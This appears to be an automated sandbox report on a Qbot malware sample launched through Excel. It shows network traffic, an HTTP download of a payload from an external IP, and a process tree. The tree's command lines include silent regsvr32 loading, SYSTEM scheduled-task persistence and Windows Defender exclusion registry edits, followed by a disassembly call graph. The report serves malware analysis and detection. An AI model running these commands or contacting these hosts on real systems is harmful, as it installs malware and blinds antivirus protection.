                                        Sep 28, 2021 18:00:35.612565041 CEST4916980192.168.2.22185.183.96.67
                                        Sep 28, 2021 18:00:47.659382105 CEST4917080192.168.2.22185.250.148.213
                                        Sep 28, 2021 18:00:50.667859077 CEST4917080192.168.2.22185.250.148.213
                                        Sep 28, 2021 18:00:56.674288034 CEST4917080192.168.2.22185.250.148.213
                                        Sep 28, 2021 18:01:08.673470974 CEST4917180192.168.2.22185.250.148.213
                                        Sep 28, 2021 18:01:10.524471998 CEST8049167190.14.37.178192.168.2.22
                                        Sep 28, 2021 18:01:10.524534941 CEST4916780192.168.2.22190.14.37.178
                                        Sep 28, 2021 18:01:11.682940006 CEST4917180192.168.2.22185.250.148.213
                                        Sep 28, 2021 18:01:17.689526081 CEST4917180192.168.2.22185.250.148.213
                                        Sep 28, 2021 18:02:00.812318087 CEST4916780192.168.2.22190.14.37.178
                                        Sep 28, 2021 18:02:00.997560024 CEST8049167190.14.37.178192.168.2.22

                                        HTTP Request Dependency Graph

                                        • 190.14.37.178

                                        HTTP Packets

                                        Session ID: 0
                                        Source IP: 192.168.2.22
                                        Source Port: 49167
                                        Destination IP: 190.14.37.178
                                        Destination Port: 80
                                        Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                                        Timestamp: Sep 28, 2021 18:00:01.173538923 CEST
                                        kBytes transferred: 0
                                        Direction: OUT
                                        Data:
                                        GET /44467.7495993056.dat HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 190.14.37.178
                                        Connection: Keep-Alive
                                        Sep 28, 2021 18:00:02.207995892 CEST1INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 28 Sep 2021 16:00:02 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 387072
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.16
                                        Accept-Ranges: bytes
                                        Expires: 0
                                        Cache-Control: no-cache, no-store, must-revalidate
                                        Content-Disposition: attachment; filename="44467.7495993056.dat"


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Memory Usage

                                        High Level Behavior Distribution

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:17:59:20
                                        Start date:28/09/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                        Imagebase:0x13fe10000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:00:54
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32 -silent ..\Drezd.red
                                        Imagebase:0xffeb0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:00:55
                                        Start date:28/09/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -silent ..\Drezd.red
                                        Imagebase:0x400000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:00:56
                                        Start date:28/09/2021
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x410000
                                        File size:2972672 bytes
                                        MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:18:01:00
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32 -silent ..\Drezd1.red
                                        Imagebase:0xffeb0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:01:00
                                        Start date:28/09/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15
                                        Imagebase:0x610000
                                        File size:179712 bytes
                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:01:00
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32 -silent ..\Drezd2.red
                                        Imagebase:0xffeb0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:01:02
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                                        Imagebase:0xff2a0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:01:03
                                        Start date:28/09/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -s 'C:\Users\user\Drezd.red'
                                        Imagebase:0xa90000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:01:05
                                        Start date:28/09/2021
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x410000
                                        File size:2972672 bytes
                                        MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security

                                        General

                                        Start time:18:01:07
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'
                                        Imagebase:0xff260000
                                        File size:74752 bytes
                                        MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:18:01:09
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\reg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0'
                                        Imagebase:0xff620000
                                        File size:74752 bytes
                                        MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:18:03:00
                                        Start date:28/09/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                                        Imagebase:0xffdc0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:18:03:00
                                        Start date:28/09/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -s 'C:\Users\user\Drezd.red'
                                        Imagebase:0xd10000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Code Analysis

                                          Execution Graph

                                          Execution Coverage:8%
                                          Dynamic/Decrypted Code Coverage:1.4%
                                          Signature Coverage:6.2%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:61

                                          Graph

11573->11570 11694 10008604 HeapAlloc 11574->11694 11576 10009b6d 11604 10005c45 11576->11604 11695 1000b5f6 11576->11695 11579 100095c7 HeapAlloc 11580 10009bb0 11579->11580 11581 10009ceb 11580->11581 11586 10009bdc 11580->11586 11582 10009d3c 11581->11582 11583 10009cfd 11581->11583 11584 10009292 2 API calls 11582->11584 11585 10009ce7 11583->11585 11588 10009292 2 API calls 11583->11588 11584->11585 11587 100085c2 2 API calls 11585->11587 11586->11585 11705 10009292 11586->11705 11590 10009d5c 11587->11590 11588->11585 11591 1000861a 2 API calls 11590->11591 11594 10009db2 11590->11594 11592 10009d9b memset 11591->11592 11593 1000861a 2 API calls 11592->11593 11593->11594 11602 1000861a 2 API calls 11594->11602 11596 100095e1 HeapAlloc 11597 10009c3f 11596->11597 11598 100092e5 2 API calls 11597->11598 11600 10009c51 11598->11600 11599 10009292 2 API calls 11601 10009cc8 11599->11601 11603 100085d5 2 API calls 11600->11603 11607 1000861a 2 API calls 11601->11607 11602->11604 11605 10009c5f 11603->11605 11604->11318 11604->11319 11613 1000fb19 11604->11613 11711 10009256 11605->11711 11607->11585 11609 1000861a 2 API calls 11610 10009c96 11609->11610 11611 1000861a 2 API calls 11610->11611 11612 10009ca1 11611->11612 11612->11599 11719 10008604 HeapAlloc 11613->11719 11615 1000fb20 11616 1000fb2a 11615->11616 11720 1000a6a9 11615->11720 11616->11319 11619 1000fb6e 11619->11319 11621 1000fb55 11622 1000f8cc 15 API calls 11621->11622 11623 1000fb6b 11622->11623 11623->11319 11625 1000a86d 5 API calls 11624->11625 11626 10005d9a 11625->11626 11627 10005c6e 11626->11627 11628 10005974 8 API calls 11626->11628 11627->11323 11627->11324 11629 10005dd4 11628->11629 11629->11627 11752 10009ebb 11629->11752 11632 10005de6 lstrcmpiW 11632->11627 11634 1000a86d 5 API calls 11633->11634 11635 1000598d 11634->11635 11636 10009292 2 API calls 11635->11636 11637 1000599a 11635->11637 11638 100059bd 11636->11638 11776 1000590c 11638->11776 11640 100059cd 11641 100059f1 
11640->11641 11644 1000590c 2 API calls 11640->11644 11642 1000861a 2 API calls 11641->11642 11643 100059fd 11642->11643 11645 10005bc4 11643->11645 11644->11641 11646 10009ebb 3 API calls 11645->11646 11647 10005bce 11646->11647 11648 10005bd7 11647->11648 11649 10005bdc lstrcmpiW 11647->11649 11648->11336 11650 10005bf2 11649->11650 11651 10005c14 11649->11651 11781 10009f6c 11650->11781 11653 1000861a 2 API calls 11651->11653 11653->11648 11824 10008604 HeapAlloc 11656->11824 11658 10005b11 11659 10005b24 GetDriveTypeW 11658->11659 11660 10005b55 11658->11660 11659->11660 11825 10005a7b 11660->11825 11662 10005b71 11663 10005ba1 11662->11663 11842 10004d6d 11662->11842 11928 1000a39e 11663->11928 11667 1000a39e 2 API calls 11668 10005bbd 11667->11668 11668->11325 11670 1000109a HeapAlloc 11669->11670 11671 1000f8db 11670->11671 12428 100061b4 memset 11671->12428 11674 100085d5 2 API calls 11675 1000f901 11674->11675 11676 1000f978 11675->11676 12440 10009e66 11675->12440 11676->11336 11680 1000f92c 11680->11676 11681 1000109a HeapAlloc 11680->11681 11682 1000f93e 11681->11682 11683 10009640 2 API calls 11682->11683 11684 1000f94d 11683->11684 11685 1000a911 2 API calls 11684->11685 11686 1000f95e 11685->11686 11687 1000f96c 11686->11687 12446 1000a239 11686->12446 11688 1000861a 2 API calls 11687->11688 11688->11676 11691 10005a73 11690->11691 12454 10005631 11691->12454 11694->11576 11696 1000b60f 11695->11696 11697 1001242d _ftol2_sse 11696->11697 11698 1000b61f 11697->11698 11699 100095c7 HeapAlloc 11698->11699 11700 1000b62e 11699->11700 11701 1000b66a 11700->11701 11703 1001242d _ftol2_sse 11700->11703 11702 100085c2 2 API calls 11701->11702 11704 10009b91 11702->11704 11703->11700 11704->11579 11706 100092a4 11705->11706 11717 10008604 HeapAlloc 11706->11717 11708 100092c1 11709 100092de 11708->11709 11710 100092cd lstrcatA 11708->11710 11709->11590 11709->11596 11709->11612 11710->11708 11712 1000928c 11711->11712 11713 1000925f 11711->11713 11712->11609 
11718 10008604 HeapAlloc 11713->11718 11715 10009271 11715->11712 11716 10009279 MultiByteToWideChar 11715->11716 11716->11712 11717->11708 11718->11715 11719->11615 11721 1000a6c2 11720->11721 11722 1000a6bb 11720->11722 11721->11722 11725 1000a6f0 11721->11725 11747 10008604 HeapAlloc 11721->11747 11722->11619 11726 1000f9bf 11722->11726 11724 1000861a 2 API calls 11724->11722 11725->11722 11725->11724 11748 10008604 HeapAlloc 11726->11748 11728 1000fb10 11728->11621 11729 1000f9d2 11729->11728 11730 1000fabc 11729->11730 11749 1000109a 11729->11749 11733 1000861a 2 API calls 11730->11733 11733->11728 11734 100095e1 HeapAlloc 11735 1000fa2c 11734->11735 11736 100092e5 2 API calls 11735->11736 11737 1000fa49 11736->11737 11738 1000a6a9 3 API calls 11737->11738 11739 1000fa56 11738->11739 11740 100085d5 2 API calls 11739->11740 11741 1000fa62 11740->11741 11742 100085d5 2 API calls 11741->11742 11744 1000fa6b 11742->11744 11743 1000861a 2 API calls 11745 1000fab1 11743->11745 11744->11743 11746 1000861a 2 API calls 11745->11746 11746->11730 11747->11725 11748->11729 11750 10008531 HeapAlloc 11749->11750 11751 100010b5 11750->11751 11751->11734 11755 10009f95 11752->11755 11756 10009fbe 11755->11756 11767 10009b0e 11756->11767 11758 10005de2 11758->11627 11758->11632 11759 10009fc9 11759->11758 11770 1000be9b 11759->11770 11761 1000a095 11762 1000861a 2 API calls 11761->11762 11762->11758 11763 1000a070 11764 1000861a 2 API calls 11763->11764 11764->11761 11765 10009ffd 11765->11761 11765->11763 11766 10008669 HeapAlloc 11765->11766 11766->11763 11774 10008604 HeapAlloc 11767->11774 11769 10009b1a 11769->11759 11771 1000bec1 11770->11771 11773 1000bec5 11771->11773 11775 10008604 HeapAlloc 11771->11775 11773->11765 11774->11769 11775->11773 11777 1000591c 11776->11777 11780 10005917 11776->11780 11778 10005934 GetLastError 11777->11778 11779 1000593f GetLastError 11777->11779 11778->11780 11779->11780 11780->11640 11782 10009f7c 11781->11782 11797 1000a0ab 
11782->11797 11785 1000b1b1 SetFileAttributesW memset 11786 1000b1ec 11785->11786 11787 1001242d _ftol2_sse 11786->11787 11796 1000b1ff 11786->11796 11788 1000b21b 11787->11788 11789 10009640 2 API calls 11788->11789 11790 1000b22c 11789->11790 11791 100092e5 2 API calls 11790->11791 11792 1000b23d 11791->11792 11792->11796 11812 1000b0de 11792->11812 11795 1000861a 2 API calls 11795->11796 11796->11651 11798 10005c08 11797->11798 11799 1000a0c8 11797->11799 11798->11651 11798->11785 11799->11798 11800 1001242d _ftol2_sse 11799->11800 11801 1000a112 11800->11801 11811 10008604 HeapAlloc 11801->11811 11803 1000a126 11803->11798 11804 100122d3 _ftol2_sse 11803->11804 11805 1000a168 11804->11805 11806 10009b0e HeapAlloc 11805->11806 11809 1000a1b4 11806->11809 11807 1000a21e 11808 1000861a 2 API calls 11807->11808 11808->11798 11809->11807 11810 1000861a 2 API calls 11809->11810 11810->11807 11811->11803 11813 1000b101 11812->11813 11814 1000b109 memset 11813->11814 11823 1000b178 11813->11823 11815 100095e1 HeapAlloc 11814->11815 11816 1000b125 11815->11816 11817 1001242d _ftol2_sse 11816->11817 11818 1000b141 11817->11818 11819 10009640 2 API calls 11818->11819 11820 1000b157 11819->11820 11821 100085d5 2 API calls 11820->11821 11822 1000b160 MoveFileW 11821->11822 11822->11823 11823->11795 11824->11658 11936 10001080 11825->11936 11830 100085c2 2 API calls 11831 10005ab7 11830->11831 11832 10001080 HeapAlloc 11831->11832 11841 10005af7 11831->11841 11833 10005ac5 11832->11833 11945 10008910 11833->11945 11837 100085c2 2 API calls 11839 10005aeb 11837->11839 11838 10005ae1 11838->11837 11840 1000861a 2 API calls 11839->11840 11840->11841 11841->11662 11843 10004d91 11842->11843 11844 10004de7 11842->11844 11846 100095c7 HeapAlloc 11843->11846 11845 1000b7a8 10 API calls 11844->11845 11897 10004e1d 11844->11897 11847 10004dfc 11845->11847 11848 10004d9b 11846->11848 11849 1000a86d 5 API calls 11847->11849 11850 100095c7 HeapAlloc 11848->11850 11851 10004e08 
11849->11851 11852 10004dab 11850->11852 12041 1000a471 11851->12041 11852->11844 11854 10004db9 GetModuleHandleA 11852->11854 11856 10004dc6 GetModuleHandleA 11854->11856 11857 10004dcd 11854->11857 11855 10004e14 11858 1000e1bc 7 API calls 11855->11858 11855->11897 11856->11857 11860 100085c2 2 API calls 11857->11860 11859 10004e37 11858->11859 11861 100095e1 HeapAlloc 11859->11861 11862 10004dde 11860->11862 11863 10004e48 11861->11863 11864 100085c2 2 API calls 11862->11864 11865 100092e5 2 API calls 11863->11865 11864->11844 11866 10004e60 11865->11866 11867 100085d5 2 API calls 11866->11867 11869 10004e73 11867->11869 11868 10004e9c 11870 1000861a 2 API calls 11868->11870 11869->11868 12046 1000896f 11869->12046 11872 10004ead 11870->11872 12066 10004a0b memset 11872->12066 11873 10004e8f 11873->11868 11876 1000a2e3 6 API calls 11873->11876 11876->11868 11878 100095e1 HeapAlloc 11880 100051fd 11878->11880 11881 100092e5 2 API calls 11880->11881 11885 10005215 11881->11885 11882 10005245 11884 100085d5 2 API calls 11882->11884 11883 1000e2c6 40 API calls 11886 10004f64 11883->11886 11887 10005251 lstrcpynW lstrcpynW 11884->11887 11885->11882 11891 1000861a 2 API calls 11885->11891 11888 10005082 11886->11888 11889 10004fb3 11886->11889 11922 100051f1 11886->11922 11888->11922 12140 1000fc1f 11888->12140 11895 10004fbc 11889->11895 11889->11922 11891->11882 12135 10008604 HeapAlloc 11895->12135 11897->11663 11899 10005006 11899->11897 11922->11878 11929 1000a3ad 11928->11929 11935 10005bb5 11928->11935 11930 1000a3d2 11929->11930 11931 1000861a 2 API calls 11929->11931 11932 1000861a 2 API calls 11930->11932 11931->11929 11933 1000a3dd 11932->11933 11934 1000861a 2 API calls 11933->11934 11934->11935 11935->11667 11937 100084ab HeapAlloc 11936->11937 11938 10001096 11937->11938 11939 1000a51a 11938->11939 11940 1000a538 11939->11940 11941 1001242d _ftol2_sse 11940->11941 11942 1000a580 11940->11942 11944 10005aa7 11940->11944 11941->11940 11943 10008669 
HeapAlloc 11942->11943 11942->11944 11943->11944 11944->11830 11946 1000891f 11945->11946 11951 10005ad4 11945->11951 11964 10008604 HeapAlloc 11946->11964 11948 10008929 11948->11951 11965 10008815 11948->11965 11951->11838 11953 1000a2e3 11951->11953 11952 1000861a 2 API calls 11952->11951 12000 10008a90 11953->12000 11957 1000a397 11957->11838 11958 1000a38f 12015 10008cc0 11958->12015 11961 1000a2fd 11961->11957 11961->11958 11962 10008698 3 API calls 11961->11962 12006 10009749 11961->12006 12011 100091a6 11961->12011 11962->11961 11964->11948 11975 10008604 HeapAlloc 11965->11975 11967 100088d6 11969 1000861a 2 API calls 11967->11969 11974 10008837 11967->11974 11968 1000882a 11968->11967 11968->11974 11976 1000ebf0 11968->11976 11969->11974 11972 100088f0 11973 1000861a 2 API calls 11972->11973 11973->11974 11974->11951 11974->11952 11975->11968 11991 10008604 HeapAlloc 11976->11991 11978 1000ec14 11979 1000ed7f 11978->11979 11992 10008604 HeapAlloc 11978->11992 11982 1000861a 2 API calls 11979->11982 11981 1000ec2c 11981->11979 11993 10008604 HeapAlloc 11981->11993 11983 1000eda5 11982->11983 11984 1000861a 2 API calls 11983->11984 11986 1000edb3 11984->11986 11987 100088cf 11986->11987 11988 1000861a 2 API calls 11986->11988 11987->11967 11987->11972 11988->11987 11989 1000ec42 11989->11979 11994 10008698 11989->11994 11991->11978 11992->11981 11993->11989 11999 10008604 HeapAlloc 11994->11999 11996 100086ad 11997 1000861a 2 API calls 11996->11997 11998 100086d5 11996->11998 11997->11998 11998->11989 11999->11996 12003 10008ab3 12000->12003 12001 10008604 HeapAlloc 12001->12003 12002 10008be7 12005 10008604 HeapAlloc 12002->12005 12003->12001 12003->12002 12004 1000861a 2 API calls 12003->12004 12004->12003 12005->11961 12007 1000974b 12006->12007 12008 10009780 SetLastError 12007->12008 12009 1000978c SetLastError 12007->12009 12010 10009799 12008->12010 12009->12010 12010->11961 12012 100091b1 12011->12012 12014 100091c7 12011->12014 12027 10008604 
HeapAlloc 12012->12027 12014->11961 12017 10008ccf 12015->12017 12026 10008d57 12015->12026 12016 10008d09 12021 10008d19 12016->12021 12028 10008de5 12016->12028 12017->12016 12018 1000861a 2 API calls 12017->12018 12017->12026 12018->12017 12020 1000861a 2 API calls 12022 10008d34 12020->12022 12021->12020 12021->12022 12023 1000861a 2 API calls 12022->12023 12025 10008d4a 12022->12025 12023->12025 12024 1000861a 2 API calls 12024->12026 12025->12024 12026->11957 12027->12014 12035 10008604 HeapAlloc 12028->12035 12030 10008e1e 12032 10008e61 12030->12032 12034 10008e28 12030->12034 12036 1000879d 12030->12036 12033 1000861a 2 API calls 12032->12033 12033->12034 12034->12021 12035->12030 12037 1001242d _ftol2_sse 12036->12037 12038 100087b6 12037->12038 12039 100087e3 12038->12039 12040 1001242d _ftol2_sse 12038->12040 12039->12032 12040->12038 12042 1000a485 12041->12042 12043 1000a495 GetLastError 12042->12043 12044 1000a48b GetLastError 12042->12044 12045 1000a4a2 12043->12045 12044->12045 12045->11855 12161 10008604 HeapAlloc 12046->12161 12048 10008990 12049 100089a1 lstrcpynW 12048->12049 12056 1000899a 12048->12056 12050 10008a14 12049->12050 12051 100089c4 12049->12051 12162 10008604 HeapAlloc 12050->12162 12053 1000a6a9 3 API calls 12051->12053 12055 100089d0 12053->12055 12054 10008a1f 12054->12056 12058 10008a39 12054->12058 12059 1000861a 2 API calls 12054->12059 12057 10008815 3 API calls 12055->12057 12055->12058 12056->11873 12060 100089ea 12057->12060 12062 1000861a 2 API calls 12058->12062 12064 10008a61 12058->12064 12059->12058 12060->12054 12061 100089f0 12060->12061 12065 1000861a 2 API calls 12061->12065 12062->12064 12063 1000861a 2 API calls 12063->12056 12064->12063 12065->12056 12067 10004a41 12066->12067 12068 10004a76 12067->12068 12163 10002ba4 12067->12163 12069 1000b7a8 10 API calls 12068->12069 12103 10004ae2 12068->12103 12071 10004a8d 12069->12071 12072 1000b67d 4 API calls 12071->12072 12073 10004a9d 12072->12073 12179 100049c7 
12073->12179 12103->11922 12130 1000e2c6 12103->12130 12132 1000e2fa 12130->12132 12133 10004f40 12132->12133 12332 10008604 HeapAlloc 12132->12332 12333 10004905 12132->12333 12133->11883 12133->11886 12135->11899 12141 1000fc43 12140->12141 12142 100050fa 12140->12142 12143 10008669 HeapAlloc 12141->12143 12142->11922 12150 10008604 HeapAlloc 12142->12150 12161->12048 12162->12054 12164 10002bc0 12163->12164 12165 1000109a HeapAlloc 12164->12165 12178 10002c5c 12164->12178 12166 10002bd3 12165->12166 12167 100092e5 2 API calls 12166->12167 12168 10002be5 12167->12168 12169 100085d5 2 API calls 12168->12169 12170 10002bf0 12169->12170 12171 1000109a HeapAlloc 12170->12171 12172 10002bfa 12171->12172 12178->12068 12180 10009256 2 API calls 12179->12180 12181 100049d2 12180->12181 12182 100095e1 HeapAlloc 12181->12182 12183 100049e1 12182->12183 12332->12132 12334 10004928 12333->12334 12335 10004a0b 35 API calls 12334->12335 12339 10004995 12334->12339 12340 10004948 12335->12340 12336 10004986 12351 100047ca 12336->12351 12339->12132 12340->12336 12340->12339 12341 1000ad44 12340->12341 12342 1000ad65 12341->12342 12347 1000ad5e 12341->12347 12347->12340 12452 10008604 HeapAlloc 12428->12452 12430 100061ef 12431 10006360 12430->12431 12453 10008604 HeapAlloc 12430->12453 12431->11674 12433 1000626f 12434 1000861a 2 API calls 12433->12434 12435 10006352 12434->12435 12436 1000861a 2 API calls 12435->12436 12436->12431 12437 1000628d memset memset 12438 10006209 12437->12438 12438->12431 12438->12433 12438->12437 12439 1000b1b1 10 API calls 12438->12439 12439->12438 12441 10009f95 3 API calls 12440->12441 12442 10009e87 12441->12442 12443 10009e9e 12442->12443 12444 1000861a 2 API calls 12442->12444 12443->11676 12445 10008604 HeapAlloc 12443->12445 12444->12443 12445->11680 12447 1000a245 12446->12447 12448 10009b0e HeapAlloc 12447->12448 12450 1000a275 12448->12450 12449 1000a2da 12449->11687 12450->12449 12451 1000861a 2 API calls 12450->12451 12451->12449 
12452->12430 12453->12438 12455 10009e66 3 API calls 12454->12455 12456 10005642 12455->12456 12457 1000980c GetSystemTimeAsFileTime 12456->12457 12459 100056c0 12456->12459 12458 1000565b 12457->12458 12460 10009f06 4 API calls 12458->12460 12459->11328 12461 1000566f 12460->12461 12462 10009f06 4 API calls 12461->12462 12463 10005685 12462->12463 12490 1000e4c1 12463->12490 12466 1000a86d 5 API calls 12467 100056a4 12466->12467 12467->12459 12468 100056e9 12467->12468 12497 10008604 HeapAlloc 12467->12497 12498 1000153b CreateMutexA 12468->12498 12471 10005707 12513 100098ee 12471->12513 12473 10005715 12525 10003017 12473->12525 12491 1000e1bc 7 API calls 12490->12491 12492 1000e4d3 12491->12492 12493 1000e1bc 7 API calls 12492->12493 12494 1000e4ec 12493->12494 12590 1000e450 12494->12590 12496 1000568d 12496->12466 12497->12468 12499 10001558 CreateMutexA 12498->12499 12509 100015ad 12498->12509 12500 1000156e 12499->12500 12499->12509 12501 10001080 HeapAlloc 12500->12501 12502 10001578 12501->12502 12503 100091a6 HeapAlloc 12502->12503 12502->12509 12504 1000158c 12503->12504 12505 100085c2 2 API calls 12504->12505 12506 10001599 12505->12506 12604 10008604 HeapAlloc 12506->12604 12508 100015a3 12508->12509 12605 10008604 HeapAlloc 12508->12605 12509->12471 12511 100015c4 12511->12509 12512 1000e1bc 7 API calls 12511->12512 12512->12509 12515 1000990c 12513->12515 12514 1000996c 12519 1000997d 12514->12519 12610 10008604 HeapAlloc 12514->12610 12515->12514 12520 10009910 12515->12520 12606 1000984a 12515->12606 12517 1000a471 2 API calls 12521 100099e2 12517->12521 12519->12517 12519->12520 12520->12473 12522 10009a56 SetThreadPriority 12521->12522 12523 10009a1f 12521->12523 12522->12520 12523->12520 12524 1000861a 2 API calls 12523->12524 12524->12520 12526 10003025 12525->12526 12528 1000302a 12525->12528 12611 1000bb20 12526->12611 12529 100031c2 12528->12529 12530 1000c292 6 API calls 12529->12530 12531 100031dd 12530->12531 12532 100031e6 12531->12532 
